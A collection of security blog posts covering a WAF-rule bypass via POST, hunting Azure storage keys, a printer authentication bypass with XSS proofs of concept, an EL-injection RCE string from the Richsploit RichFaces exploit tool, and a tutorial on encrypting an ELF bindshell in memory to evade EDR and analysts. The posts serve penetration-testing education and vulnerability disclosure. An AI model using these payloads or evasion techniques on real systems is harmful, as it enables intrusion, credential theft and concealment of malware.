One could think: “Ok, but this is a stupid mistake! Just fire these monkeys preteding to be security guys!”. This is not totally true as the “-normalized” option, that undoubtedly simplifies the life of network engineers, can be adopted only with the most recent versions of iRules, leaving as a unique option the creation and deployment of a custom rule which is notoriously an error-prone process. However, it is still surprising how many sources out there are publicly advertising these flawed examples, even in the official F5 documentation (watch the screenshot below).

For copy & paste supporters this kind of “code snippets” are like honey. Don’t get us wrong. We have nothing against copy & paste, except when this practice is performed in cybersecurity without understanding what is being done. In such circumstances copy&paste has been a countless number of times the root cause of many serious security vulnerabilities.

But let’s switch back to our main story! After the identification of the new issue the fix was quick (see the added part below).

Basically, following the “while” cycle (lines 9-13 in the picture at the beginning of this paragraph), the content of the WAF rule was updated with an “if” branch. It checks, at the end of the loop, if the value of the counter variable “cnt” is equal to the value of the “max” variable. In case it is, this means that the “while” cycle was interrupted while there were still characters to decode left in the URI. As we don’t want to process a request still containing encoded characters, the WAF rule responds with a 404 error, preventing the activation of the malicious payload.

Wrong assumptions … any gumption?

Most misconfigurations and bypass techniques at WAF level are not linked to technical problems or bugs afflicting the device itself, but wrong assumptions in the logic of its rules.

Our story may have had a happy ending at this point. Two revalidations had already revealed some flaws in the web application firewall’s configuration and finally a pretty tough WAF rule had been implemented, decently decoding the URI. To make it short, in a certain moment somebody realizes that the same vulnerability could have been exploited with a HTTP POST request.  The WAF rule provided protection only against GET requests and a new modification to it was needed. So, after the umpteenth change we were called back again to verify that this time everything was working as expected.

To cover both exploitation cases (GET and POST) the network engineers thought to apply a fix by deleting the line 16 of the WAF rule:

if ([HTTP::method] equals “GET”) [...]

Without that line the check on the URI would have been performed on any HTTP request, regardless of the method specified. It could have been an elegant solution if had worked…but can you spot the problem here? Take yourself few seconds before to answer. Well, when the URL below is browsed:

https://victim.com/appname/MalPath/something?badparam=%rce_payload%”

the following HTTP request is issued:

GET /appname/MalPath/something?badparam=%rce_payload% HTTP/1.1
[...]

If after discovering that the GET method is blocked at WAF level an attacker attempted to circumvent it via POST, the following request would be instead issued:

POST /appname/MalPath/something HTTP/1.1
[other HTTPheaders]

badparam=%rce_payload%

Would the “%rce_payload%” be triggered this time, given all the premises above? Yes, it would. Why? The answer is in the lines 17 and 18 of the WAF rule, shown below once more.

Let’s compare the content of the attacker’s POST request with the logic of the custom rule. In this case, at line 17 the fully decoded and lowercase-converted URI contains the string “/malpath/”. True. However the line 18 stems from an incorrect assumption. The parameters of a POST request reside in the HTTP body and not in the query string! The line 18 of the WAF rule is instead checking for the presence of the string “badparam=” in the “$decodedUri” variable which in the case of the attacker’s POST request returns the string “/appname/MalPath/something”. For sake of clarity, the WAF rule is not checking the string “badparam=” where it should, so the rule is bypassed.

Officially the revalidation of the revalidation of the revalidation was last round of check to be confident enough that the WAF rule implemented was providing the level of security desired against this web vulnerability. It took 1 week to tune up the custom WAF rule and then, suddenly, few more days later, it was removed because in the meantime the application code had been patched 😀

If it helps to repeat that once more, WAF virtual patching is ok if you need a bit of extra time before fixing a serious vulnerability, but it must not be abused. One week of exposure to RCE is a huge period of time for motivated attackers. The only way to sleep peacefully is to solve your problems at code level and patch it, patch it, patch it as soon as possible! Probably would have been worth from the beginning to dedicate all the resources to patch the application code than struggling to implement a working WAF rule by trial and error.

That’s all for today. Other stories like this will be published in future. So stay tuned and continue to follow us!

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

Cloud pentesting in Azure: one access key to rule them all

As cloud computing is on the rise, more of our penetration testing efforts will shift towards services hosted in the cloud. Testing a web app for vulnerabilities is no different regardless if it’s hosted on-premise, in the cloud or in your basement. What does change is how the application interacts with other services. Take for example the database: not anymore located on your own SQL server but in the cloud as well. The solution used by Azure is called Azure Storage, and in this article we explore its weaknesses.

Azure Storage

The type of data that can be stored on an Azure Storage account is wide-ranging. You should think of it as the cloud-replacement for file servers. Some examples:

  • Logs
  • Virtual machine hard disk images
  • Backups
  • Documents and files

There are multiple ways in which a user or an application can access this data. One of them is by use of a key.

By default, every storage account has two keys that provide full access to its data. They are called the primary key and the secondary key, although they both provide the same level of access. Multiple services using the storage account are using these keys, so we are dealing with:

  • A full access key
  • Shared between services
  • Inconvenient to replace

It’s a scary thought. To view these keys, we have to browse the Azure Portal as can be seen from below image.

The access keys are accessible to the Azure administrator by browsing to the storage account settings.

Attacker value

It’s immediately clear that this is an attractive lure for an attacker: lots of data and shared keys that give full access.

So where do we find this key? The first place to look is in source code and configuration files. Developers need to write code to access the storage, and might place the key inside their code (instead of the much more secure option, the Azure Key Vault). Storage account keys are 64-byte values, encoded in Base64.

Because code bases can be large, you can start by searching for usage of these classes and libraries:

  • Microsoft.WindowsAzure.Storage.Auth (.NET)
  • com.microsoft.azure.storage.StorageCredentials (Java)
  • AzureStorage.createBlobService (JavaScript)

In config files, you can try to grep on:

  • StorageConnectionString
  • StorageServiceKeys
  • StorageAccountKey

For example, you can see from this GitHub screenshot that many repositories expose such keys within code. It’s not unthinkable that the same is possible for the assignment you are working on.

Azure storage keys can be found on github
Searching all repositories of GitHub for the string “StorageConnectionString” returns more than 35.000 results. Take for example this recently updated config file exposing the storage key.

Developer tools

A second place of finding these keys is by obtaining them from the tools that developers use to access Azure Storage. For this scenario, you will need foothold on a developers machine. There are a number of tools which are frequently used for this purpose:

  • Azure Storage Explorer
  • CloudXplorer
  • TableXplorer
  • Redgate Azure Explorer

Having access to these tools, it is often straightforward to find the keys: they are usually set in the preferences or configuration section of the application.

Using the Azure Storage key

Once you have obtained the key, you should start identifying the type of storage accessible. Azure distinguishes between blob data, table data, queues and files. How to exactly determine this is out of scope for this article, but I want to share with you one quick and easy way of accessing files.

By default, Azure files are reachable via SMB 3.0, on port 445, with only one account, and it has Full Controll permissions. All of this is not configurable. You can just establish an SMB session using the key as the password:

net use * \\<storage_account_name>.file.core.windows.net\<share_name> /USER:AZURE\<storage_account_name> <primary_key>

Just by using the primary key we get full access to the files stored in Azure Storage.

SAS tokens

Next to keys there is another interesting method of access penetration testers should be aware of: SAS tokens. As can be seen from below image, they can be created with more restrictions than the storage keys which give full access. The Azure administrator can restrict data type, set a time limit and even restrict the IP addresses from which the data may be accessed.

No file level restrictions can be made for SAS tokens created in the Azure Portal

This makes them way less powerful than storage keys, however, if you find them they may still be useful. One thing that can’t be restricted from the Azure Portal is which objects exactly can be accessed with the SAS token: it just provides access to all files (or, all blobs; all queues; etc.).

It is possible to restrict access to only one file for example, but for that the SAS token would have to be generated via Powershell, which means more effort for the administrator and thus less likely to be the case.

Conclusion

Hunting for storage access keys and tokens should be a top priority for penetration testers and red teamers conducting exercises on Azure environments. Access to storage means access to files, logs, virtual machine hard drive images and will almost in any case mean game over for the target.

Join us at Blackhat Las Vegas this year with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August! We look forward to see you there!

Meanwhile, follow us on twitter: https://twitter.com/redtimmysec

Hacking the Oce Colorwave printer: when a quick security assessment determines the success of a Red Team exercise.

Back in September 2019, as Red Timmy Security group, we have been involved in a Red Team exercise. We had to simulate the scenario of a malicious insider plugging a Raspberry Pi device in to the network to potentially use as a C&C, and to check how much time the guys monitoring the environment would have spent to detect it. Furthermore, the place where to hide our device had to be tricky enough to spot, with the aim to pour a pinch of extra pepper on the challenge against the blue team.

Consequently, we did not want simply to drop the device at the first location available, raising suspicions on other employees who were unaware of our real role and increasing the risk to be caught. Therefore the initial couple of days following the job engagement we behaved normally: we have been assigned a company laptop, a badge and completed all the on-boarding tasks, which are typical of when somebody is hired for real. Oh well, almost. The second day, after opening the browser of our new shining company laptop, we mistakenly typed in the number “1” in the URL bar, and discovered that some IP addresses were already visited in the chronology.

We selected the first URL in the list (a local IP address) and visited that. It was the web interface of the Océ Colorwave 500 printer, a big boy weighting more than 250 kilograms (see picture below).

Why should not we give a quick look at it? I guess you know how it went. We did a mini assessment of the printer that lasted a couple of hours. That was enough to discover five different flaws. However, for the matter of this story, only one was relevant. We provide the details of the rest at the end of this post.

Basically we discovered that the Oce Colorwave 500 printer was vulnerable to an authentication bypass bug on the page “http://<printer-IP>/home.jsp”. When that page is browsed by an anonymous (unauthenticated) user clicking on the “View All” button with the intention to visualize the current job queue, the application returns a login panel asking for administrative credentials.

However it was sufficient to append the parameter “openSI=[SI]” to the “home.jsp” page (with “[SI]” being the name of a network user) to view the printer inbox of that user and all the relative print jobs, so completely skipping the authentication process.

Currently the name of the network user we wanted to spy the inbox of was nothing more than its Windows active directory username. The convention used internally by the target company was easy enough to understand (a combination of the user first name and surname, and of course AD was “publicly queryable”), that was really a joke to script an automated process collecting all the printed documents from the device’s queue for subsequent manual analysis.

We did not need to poll the device frequently, just once per user, as the queue of the printed jobs was configured (a default setting of the printer we guess) so to be shred only every 2 weeks. This would have given us enough time to download everything submitted to the printer by anyone in the company that had used it in the last 14 days. After finishing the task, we started to manually analyze all the documents collected. A tedious but rewarding task at the end!

We were indeed lucky enough to find the blueprints/security plants of the customer building, including the space hosting us. At the beginning everything was quite tough to read as the blueprints were full of meaningless labels and symbols. But in the middle of the set of documents exfiltrated from the printer spool was also found a legend with the description of each symbol. Something similar to this:

After taking confidence with it, we knew the exact dislocation of desks, security cameras, conference rooms, security equipment including card readers, local alarms / sounders, electromagnetic locks, intercoms, patch panels, network cables, etc… in the building!

It was the turning point of our exercise. The place we found for our Raspberry Pi device and what happened later is another story.

Most importantly, soon after the closure of the red team operation, the e-shredding functionality has been activated and applied for all print-jobs and the device immediately isolated from the network, put behind a firewall in a separate VLAN.

We have contacted the vendor of course and communicated our findings. After few days the vendor has replied informing us of the existence of a newer firmware version compared to the one running on the printer tested by us (that was 4.0.0.0). As no CVEs have been registered for these bugs in the past, we have decided to do that.

In total we have registered five CVE(s). All these bugs (two Reflected XSS, one Stored XSS and a systemic CSRF), including the authentication bypass already described (CVE-2020-10669), have been discovered by Giuseppe Calì with the contribute of Marco Ortisi. Below you can find the additional details for each of them.

CVE-2020-10667

The web application exposed by the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Stored XSS in “/TemplateManager/indexExternalLocation.jsp”. The vulnerable parameter is “map(template_name)”.

An external location is first created by browsing the URL “http://<printer-IP>/TemplateManager/editTemplate.jsp?type=ExternalLocation”. Here the “Name” parameter (actually the “map(template_name)” parameter in the POST request generated after clicking the “Ok” button) is injected with the following sample JavaScript payload:

“<script>alert(document.cookie);</script>

After creating the external location template, any attempts to edit it will trigger the sample payload.

CVE-2020-10668

The web application exposed by the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Reflected XSS in “/home.jsp”. The vulnerable parameter is “openSI”. Browsing the URL:

http://<printer-IP>/home.jsp?openSI=</script><script>alert(document.cookie);</script>

an alert box will pop-up in the page, showing that the attacker’s payload has been executed in the context of the user’s browser session.

CVE-2020-10670

The web application exposed by the Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Reflected Cross-Site Scripting in “/SettingsEditor/settingDialogContent.jsp. The vulnerable parameter is “settingId”. Browsing the URL:

http://<printer-IP>/SettingsEditor/settingDialogContent.jsp?settingId=<img src=x onerror=”alert(document.domain);”/>

An alert box will pop-up in the page, showing that the attacker’s payload has been executed in the context of the user’s browser session.

CVE-2020-10671

The web application of the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is missing any form of CSRF protections. This is a system-wide issue. An attacker could perform administrative actions by targeting a logged-in administrative user.

That’all for today. As usual we remind you that we will be at Blackhat Las Vegas with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August 2020.

Richsploit: One tool to exploit all versions of RichFaces ever released

We are proud to release Richsploit, a tool we wrote to exploit multiple versions of RichFaces. This infamous Java library is included with many JSF web applications for providing advanced UI elements beyond the (very limited) set that is built-in with the framework. Therefore, many websites using JSF are vulnerable to exploitation.

How to detect RichFaces

When a website is using RichFaces, it will load resources from specific URLs which you can see when you monitor outgoing requests with tools like Burp or within the browser’s development tools.

  • Richfaces 3.x: http://example.com/app_name/a4j/g/..
  • Richfaces 4.x: http://example.com/app_name/rfRes/org.richfaces…

Tools like Wappalyzer can be used as well.

Vulnerable versions

All versions of RichFaces released since September 2007 (>= 3.1.0) are vulnerable to at least one exploit. See below an overview of which version is vulnerable to which exploit:

RichFaces 3
3.1.0 ≤ 3.3.3 CVE-2013-2165
3.1.0 ≤ 3.3.4 CVE-2018-12533
3.1.0 ≤ 3.3.4 CVE-2018-14667
RichFaces 4
4.0.0 ≤ 4.3.2 CVE-2013-2165
4.0.0 ≤ 4.5.4 CVE-2015-0279
4.5.3 ≤ 4.5.17 CVE-2018-12532

Exploits

What follows is a brief overview of how each vulnerability works and can be exploited. For more background information, I will refer to some external articles which describe the technicalities in more details.

CVE-2013-2165

This vulnerability was the first one identified on RichFaces, and affects both version 3.x and 4.x. It’s a classic deserialization vulnerability, which allows deserialization of arbitrary Java serialized object streams. To exploit it, the application has to be linked with vulnerable libraries in the classpath, to be able to build a gadget chain.

Because there is no lookahead implemented, every class on the classpath is a potential candidate. One example would be the Apache Commons class, which is often linked with JSF applications.

You can prepare a payload with a tool like ysoserial, save it to a file, and fetch it to Richsploit via the “-p” parameter.

More information: https://codewhitesec.blogspot.com/2018/05/poor-richfaces.html

CVE-2015-0279

This second vulnerability is harder to exploit, but potentially more rewarding. It’s an EL injection vulnerability, that can lead to remote code execution. The idea is to send a proper serialized object this time, but inside the object we put malicious EL code.

EL stands for Expression Language, which is a limited form of Java, used to attach small pieces of logic to UI listeners (e.g. clicking a button would invoke a function call). Even though the capabilities are very limited, we can use a series of tricks to achieve remote code execution.

Richsploit will inject the following EL string when executed: #{"".getClass().forName("java.lang.ProcessBuilder").getConstructors()[1].newInstance("/bin/sh~-c~"+COMMAND+".split("~")).start()}

Let’s take a step-by-step look at how this works.

Expression Language restricts us to a one liner, and we can only start with a variable which is in EL scope:

  • Lambda parameters
  • Literals
  • Managed beans
  • Implicit objects
  • Variables defined in the xhtml

In our example, we start with an empty string, which is a literal

Now we need a way to transfer from a String class to a ProcessBuilder class. We do that by first transforming to the generic Class<> type. Class is an object in Java that represents a Java class. It has methods like getConstructor(), getMethod(), etc.

From there we transform our object to a ProcessBuilder type, using the forName() function from Class. We use ProcessBuilder instead of the more famous Runtime, because

  • ProcessBuilder allows to set the command via the constructor
  • Runtime needs a call to Runtime.getRuntime() but static calls are not allowed in EL (yet another restriction)

To use this class, we have to instantiate it. The getConstructors() function returns an array of all constructors of the class. Unfortunately the order of them appearing in the array changes each time the application is launched. Therefore, this method could require some trial and error, until it is at index 1.

Luckily, ProcessBuilder only has two constructors, so we have a 50% chance of success.

Java doesn’t allow you to create a static array, so we use the split function to transform the String to a String[].

Finally, the start() function is required by ProcessBuilder to invoke execution.

More information: https://issues.redhat.com/browse/RF-13977

CVE-2018-12532

This vulnerability is a response on the fix of the previous one (CVE-2015-0279). As the patch to CVE-2015-0279 (introduced in 4.5.4) disallowed the use of parenthesis in the EL method expression of the contentProducer, it seemed like a dead end.

But if you are fimilar with EL internals, you would know that they can have custom function mappers and variable mappers, which are used by the ELResolver to resolve functions (i. e., name in ${prefix:name()}) and variables (i. e., var in ${var.property}) to Method and ValueExpression instances respectively. Fortunately, various VariableMapper implementations were added to the whitelist (since version 4.5.3).

So to exploit this, all that is needed is to use a variable in the contentProducer method expression like ${dummy.toString} and add an appropriate VariableMapper to the method expression that maps dummy to a ValueExpression, containing the EL we want to inject (same as with CVE-2015-0279).

CVE-2018-12533

This CVE is similar to the CVE-2015-0279, but it uses a different class. Instead of org.resource.MediaResourceOutput, it is using org.richfaces.renderkit.html.Paint2DResource$ImageData.

The trick is that ImageData extends org.ajax4jsf.resource.SerializableResource, which is in the whitelist that was introduced in 3.3.4 to fix the Java deserialization vulnerability (CVE-2013-2165).

More information: https://codewhitesec.blogspot.com/2018/05/poor-richfaces.html

CVE-2018-14667

This final CVE is the most elaborate one and requires some extra detailed explanation because there are no other write-ups available on the internet except this slideshare.

It’s again an EL injection, similar to CVE-2015-0279. The general idea is as follows:

  1. Visit a page that contains <a4j:mediaOutput> tag. This will register UserResource for the session
  2. Prepare serialized payload, containing the EL injection string
  3. Visit UserResource URL and attach encoded serialized payload object in URL after /DATA/
  4. The UserResource class will be instantiated with data from the payload, leading to EL execution

To see this in more detail, this is the call chain from step 3:

/richfaces-demo-jsf2-3.3.3.Final-tomcat6/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAFtUD1LAzEYfi0WP6q[...]zrk29wt4uKHd.jsf

When this URL is provided, the filter defined in web.xml sends it to BaseFilter, which will send it to:

InternetResourceService.java:
The getResourceDataForKey() function reads the /DATA/ object and returns it as Java Object.
Object resourceDataForKey = getResourceBuilder().getResourceDataForKey(resourceKey);

InternetResourceService.java:
It is then saved in resourceContext
resourceContext.setResourceData(resourceDataForKey);

InternetResourceService.java:
The ResourceLifeCycle.send() method is called, which will call sendResource()
getLifecycle().send(resourceContext, resource);

ResourceLifeCycle.java:
Here, the send() method is called DIRECTLY ON THE RESOURCE. So this roughly translates to UserResource.send(context_containing_el)
resource.send(resourceContext);

This is the send function of the vulnerable class UserResource.java of which I provide the code here:

 public void send(ResourceContext context) throws IOException {
   UriData data = (UriData) restoreData(context);
   FacesContext facesContext = FacesContext.getCurrentInstance();
   if (null != data && null != facesContext ) {
     // Send headers
     ELContext elContext = facesContext.getELContext();
     // Send content
     OutputStream out = context.getOutputStream();
     MethodExpression send = (MethodExpression)       
     UIComponentBase.restoreAttachedState(facesContext,data.createContent);
     send.invoke(elContext,new Object[]{out,data.value});
   }
 }

The send.invoke() will execute the EL coming from the context.
So the only way to reach this vulnerable method is by supplying UserResource as the resource in the URL, otherwise resource.send() will never lead to the send() method of UserResource.

Now for the payload, the object we supply is in the ‘context’ variable. It will need to survive:

  • restoreData(context)
  • A cast to UriData
  • A dereference to .createContent, which has to contain a MethodExpression

This means the gadget chain looks as follows:

org.ajax4jsf.resource.UserResource.UriData 
createContent:
javax.faces.component.StateHolderSaver
savedState:
org.jboss.el.MethodExpressionImpl
exp: "${Expression Language}"

See the source code of Richsploit for how this particular serialized object is created. Some tricks with reflection are required because UriData has private fields, and there would have been no way to set the value of createContent directly.

Download

Richsploit can be found on our GitHub page. And remember to join us at Blackhat Las Vegas this year with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August!

Blue Team vs Red Team: how to run your encrypted ELF binary in memory and go undetected

Imagine finding yourself in a “hostile” environment, one where you can’t run exploits, tools and applications without worrying about prying eyes spying on you, be they a legitimate system administrator, a colleague sharing an access with you or a software solution that scans the machine you are logged in to for malicious files. Your binary should live in encrypted form in the filesystem so that no static analysis would be possible even if identified and copied somewhere else. It should be only decrypted on the fly in memory when executed, so preventing dynamic analysis too, unless the decryption key is known.

How to implement that?

On paper everything looks fine, but practically how do we implement this? With Red Timmy Security we have created the “golden frieza” project, a collection of several techniques to support on-the-fly encryption/decryption of binaries. Even though we are not ready yet to release the full project, we are going to discuss in depth one of the methods it implements, accompanied by some supporting source code.

Why is the discussion relevant both to security analysts working at SOC departments, Threat Intelligence and Red Teams? Think about a typical Red Team operation, in which tools that commonly trigger security alerts to SOC, such as “procmon” or “mimikatz”, are uploaded in a compromised machine and then launched without having the installed endpoint protection solutions or the EDR agents complaining about that. Alternatively, think about a zero-day privilege escalation exploit that an attacker wants to run locally in a just hacked system, but they don’t want it to be reverse engineered while stored in the filesystem and consequently divulged to the rest of the world.

This is exactly the kind of techniques we are going to talk about.

A short premise before to get started. All the examples and code released (github link) work with ELF binaries. Conceptually there is nothing preventing you from implementing the same techniques with Windows PE binaries, of course with the opportune adjustments.

What to encrypt?

An ELF binary file is composed of multiple sections. We are mostly interested to encrypt the “.text” section where are located the instructions that the CPU executes when the interpreter maps the binary in memory and transfers the execution control over it. To put it simple, the section “.text” contains the logic of our application that we do not want to be reverse-engineered.

Which crypto algorithm to use?

To encrypt the “.text” section we will avoid block ciphers, which would force the binary instructions into that section to be aligned to the block size. A stream cipher algorithm fits perfectly in this case, because the length of the ciphertext produced in output will be equal to the plaintext, hence there are not padding or alignment requirements to satisfy. We choose RC4 as encryption algorithm. The discussion of its security is beyond the scope of this blog post. You might implement whatever else you like in replacement.

The implementation

The technique to-be implemented must be as easy as possible. We want to avoid manual memory mappings and symbol relocations. For example, our solution could rely on two components:

  • An ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • the launcher, a program that takes as an input the ELF dynamic library, decrypting it in memory by means of a crypto key and then executing it.

What is not clear yet is what we should encrypt: the full “.text” section or just the malicious functions exported in the ELF module? Let’s try to put in practice an experiment. The following source code exports a function called “testalo()” taking no parameter. After compilation we want it to be decrypted only once it is loaded in memory.

We compile the code as a dynamic library:

$ gcc testalo_mod.c -o testalo_mod.so -shared -fPIC

Now let’s have a look at its sections with “readelf”:

The “.text” section in the present case starts at file offset 0x580 (1408 bytes from the beginning of testalo_mod.so) and its size is 0x100 (256 bytes). What if we fill up this space with zeros and then try to programmatically load the library? Will it be mapped in our process memory or the interpreter will have something to complain about? As the encryption procedure creates garbage binary instructions, filling up the “.text” section of our module with zeros actually simulates that without trying your hand at encrypting the binary. We can do that by executing the command:

$ dd if=/dev/zero of=testalo_mod.so seek=1408 bs=1 count=256 conv=notrunc

…and then verifying with “xxd” that the “.text” section has been indeed entirely zeroed:

$ xxd testalo_mod.so
[...]
00000580: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000590: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]

To spot the final behavior that we are attemping to observe, we need an application (see code snippet of “dlopen_test.c” below) that tries to map the “testalo_mod.so” module into its address space (line 12) and then, in case of success, checks if at runtime the function “testalo()” gets resolved (line 18) and executed (line 23).

Let’s compile and execute it:

$ gcc dlopen_test -o dlopen_test -ldl
$ ./dlopen_test
Segmentation fault (core dumped)

What we are observing here is that during the execution of line 12 the program crashes. Why? This happens because, even if the call to “dlopen()” in our application is not explicitly invoking anything from “testalo_mod.so”, there are functions into “testalo_mod.so” itself that are instead automatically called (such as “frame_dummy()”) during the module initialization process. A “gdb” session will help here.

$ objdump -M intel -d testalo_mod.so

Because such functions are all zeroed, this produces a segmentation fault when the execution flow is transferred over those.

What if we only encrypted the content of the “testalo()” function on which our logic resides? To do that we just recompile “testalo_mod.so” and determine the size of the function’s code with the command “objdump -M intel -d testalo_mod.so“, by observing where the function starts and where it ends :

The formula to calculate our value is 0x6800x65a = 0x26 = 38 bytes.

Finally we overwrite the library “testalo_mod.so” with 38 bytes of zeros, starting from where the “testalo()” function locates, which this time is offset 0x65a = 1626 bytes from the beginning of the file:

$ dd if=/dev/zero of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

Then we can launch “dlopen_test” again:

$ ./dlopen_test
Segmentation fault (core dumped)

It seems nothing has changed. But a closer look will reveal the segfault has occurred for another reason this time:

Previously we have got stuck at line 12 in “dlopen_test.c”, during the initialization of the “testalo_mod.so” dynamic library. Now instead we get stuck at line 23, when “testalo_mod.so” has been properly mapped in our process memory, the “testalo()” symbol has been already resolved from it (line 18) and the function is finally invoked (line 23), which in turn causes the crash. Of course, the binary instructions are invalid because before we have zeroed that block of memory. However if we really had put encrypted instructions there and decrypted all before the invocation of “testalo()“,  everything would have worked smoothly.

So, we know now what to encrypt and how to encrypt it: only the exported functions holding our malicious payload or application logic, not the whole text section.

Next step: a first prototype for the project

Let’s see a practical example of how to decrypt in memory our encrypted payload. We said at the beginning that two components are needed in our implementation:

  • (a) an ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • (b) the launcher, a program that takes as an input the ELF dynamic library, decrypting it in memory by means of a crypto key and then executing it.

Regarding the point (a) we will continue to utilize “testalo_mod.so” for now by encrypting the “testalo()” function’s content only. Instead of using a specific program for that, just take profit of existing tools such as “dd” and “openssl”:

$ dd if=./testalo_mod.so of=./text_section.txt skip=1626 bs=1 count=38

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc of=testalo_mod.so seek=1626 bs=1 count=38 conv=notrunc

The first command basically extracts 38 bytes composing the binary instructions of “testalo()”. The second command encrypt these with the RC4 key “AAAAAAAAAAAAAAAA” (hex representation -> “41414141414141414141414141414141”) and the third command write back the encrypted content to the place where “testalo()” is located into the binary. If we observe the code of that function now with the command “objdump -M intel -d ./testalo_mod.so“, it will be unintelligible indeed:

The second needed component is the launcher (b). Let’s analyze its C code piece by piece. First it acquires in hexadecimal format the offset where our encrypted function is mapped (information that we retrieve with “readelf”) and its length in byte (line 102). Then the terminal echo is disabled (lines 116-125) in order to permit the user to type in safely the crypto key (line 128) and finally the terminal is restored back to the original state (lines 131-135).

Now we have the offset where our encrypted function is in memory but we do not know yet the full memory address where it is mapped. This is determined by looking at “/proc/PID/maps” as in the code snippet down.

Then all the pieces are settled to extract from the memory the encrypted binary instructions (line 199), decrypt everything with the RC4 key collected previously and write the output back to the location where “testalo()” function’s content lives (line 213). However, we could not do that without before marking that page of memory to be writable (lines 206-210) and then back again readable/executable only (lines 218-222) after the decrypted payload is written into it. This is because in order to protect the executable code against tampering at runtime, the interpreter loads it into a not writable memory region. After usage, the crypto key is also wiped out from memory (line 214).

Now the address of the decrypted “testalo()” function can be resolved (line 228) and the binary instructions it contains be executed (line 234).

This first version of the launcher’s source code is downloadable from here. Let’s compile it…

$ gcc golden_frieza_launcher_v1.c -o golden_frieza_launcher_v1 -ldl

…execute it, and see how it works (in bold the user input):

$ ./golden_frieza_launcher_v1 ./testalo_mod.so
Enter offset and len in hex (0xXX): 0x65a 0x26
Offset is 1626 bytes
Len is 38 bytes
Enter key: <-- key is inserted here but not echoed back
PID is: 28527
Module name is: testalo_mod.so
7feb51c56000-7feb51c57000 r-xp 00000000 fd:01 7602195 /tmp/testalo_mod.so
Start address is: 0x7feb51c56000
End address is 0x7feb51c57000

Execution of .text
==================
Sucalo Sucalo oh oh!
oh oh Sucalo Sucalo!!

As shown at the end of the command output, the in-memory decrypted content of the “testalo()” function is indeed successfully executed.

But…

What is the problem with this approach? It is that even though our library would be stripped, the symbols of the functions invoked by “testalo()” (such as “puts()” and “exit()”) that need to be resolved and relocated at runtime, remain well visible. In case the binary finishes in the hands of a system administrator or SOC analyst, even with the “.text” section encrypted in the filesystem, through simple static analysis tools such as “objdump” and “readelf” they could inference what is the purpose of our malicious binary.

Let’s see it with a more concrete example. Instead of using a dummy library, we decide to implement a bindshell (see the code here) and compile that code as an ELF module:

$ gcc testalo_bindshell.c –o testalo_bindshell.so –shared -fPIC

We strip the binary with the “strip” command and encrypt the relevant “.text” portion as already explained before. If now we look at symbols table (“readelf –s testalo_bindshell.so”) or relocations table (“readelf –r testalo_bindshell.so”) something very similar to the picture below appears:

This clearly reveals the usage of API such as “bind()”, “listen()”, “accept()”, “execl()”, etc… which are all functions that typically a bindshell implementation imports. This is inconvenient in our case because reveals the nature of our code. We need to get a workaround.

dlopen and dlsyms

To get around the problem, the approach we adopt is to resolve external symbols at runtime through “dlopen()” and “dlsyms()”.

For example, normally a snippet of code involving a call to “socket()” would look like this:

#include
[...]
if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0)
[...]

When the binary is compiled and linked, the piece of code above is responsible for the creation of an entry about “socket()” in the dynamic symbols and relocations tables. As already said, we want to avoid such a condition. Therefore the piece of code above must be changed as follows:

Here “dlopen()” is invoked only once and “dlsyms()” is called for any external functions that must be resolved. In practice:

  • int (*_socket)(int, int, int);” -> we define a function pointer variable having the same prototype as the original “socket()” function.
  • handle = dlopen (NULL, RTLD_LAZY);” -> “if the first parameter is NULL the returned handle is for the main program”, as stated in the linux man page.
  • _socket = dlsym(handle, "socket");” -> the variable “_socket” will contain the address of the “socket()” function resolved at runtime with “dlsym()”.
  • (*_socket)(PF_INET, SOCK_STREAM, 0)” -> we use it as an equivalent form of “socket(PF_INET, SOCK_STREAM, 0)”. Basically the value pointed to by the variable “_socket” is the address of the “socket()” function that has been resolved with “dlsym()”.

These modifications must be repeated for all the external functions “bind()”, “listen()”, “accept()”, “execl()”, etc…

You can see the differences between the two coding styles by comparing the UNMODIFIED BINDSHELL LIBRARY and the MODIFIED ONE. After that the new library is compiled:

$ gcc testalo_bindshell_mod.c -shared -o testalo_bindshell_mod.so -fPIC

…the main effects tied to the change of coding style are the following:

In practice the only external symbols that remain visible now are “dlopen()” and “dlsyms()”. No usage of any other socket API or functions can be inferenced.

Is this enough?

This approach has some issues too. To understand that, let’s have a look at the read-only data section in the ELF dynamic library:

What’s going on? In practice, all the strings we have declared in our bindshell module are finished in clear-text inside the “.rodata” section (starting at offset 0xaf5 and ending at offset 0xbb5) which contains all the constant values declared in the C program! Why is this happening? It depends on the way how we pass string parameters to the external functions:

_socket = dlsym(handle, "socket");

What we can do to get around the issue is to encrypt the “.rodata” section as well, and decrypt it on-the-fly in memory when needed, as we have already done with the binary instructions in the “.text” section. The new version of the launcher component (golden_frieza_launcher_v2) can be downloaded here and compiled with “gcc golden_frieza_launcher_v2.c -o golden_frieza_launcher_v2 -ldl”. Let’s see how it works. First the “.text” section of our bindshell module is encrypted:

$ dd if=./testalo_bindshell_mod.so of=./text_section.txt skip=1738 bs=1 count=1055

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc –nopad

$ dd if=./text_section.enc of=./testalo_bindshell_mod.so seek=1738 bs=1 count=1055 conv=notrunc

Same thing for the “.rodata” section:

$ dd if=./testalo_bindshell_mod.so of=./rodata_section.txt skip=2805 bs=1 count=193

